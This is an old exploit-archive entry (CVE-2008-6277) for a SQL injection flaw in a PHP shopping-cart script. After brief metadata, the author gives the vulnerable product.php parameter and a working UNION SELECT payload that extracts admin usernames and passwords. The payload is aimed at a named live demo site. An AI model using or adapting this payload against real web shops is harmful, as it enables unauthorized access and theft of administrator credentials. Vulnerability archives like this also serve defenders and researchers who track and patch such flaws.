RakhiSoftware Shopping Cart - SQL Injection
Author: XaDoS
type: webapps
platform: php
port:
date_added: 2008-11-26
date_updated: 2017-01-03
verified: 1
codes: OSVDB-50313;CVE-2008-6277
tags:
aliases:
screenshot_url:
application_url:
[â– ] Prince Comparison Script : Shopping card <= Rem0tE $ql Injection
>@.@<
> AuToR: XaDoS
> Contact M&: xados [at] hotmail [dot] it
> B§g: Remote Sql inJection
> SIte vuln: http://willscript.com/rjbike_new/index.php
>@.@<
[â– ] ExPL0iT:
|: http://www.example.com/product.php?category_id=1&subcategory_id=[$qL]
[■] D£M0:
|: http://willscript.com/rjbike_new/product.php?category_id=1&subcategory_id=4 union select 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from admin--
(you see the username and password of adm in the title of one product)
[â– ] Th4nKs::
\> str0ke </
\> OnlY me ( no help for this ) ;-) </
# milw0rm.com [2008-11-27]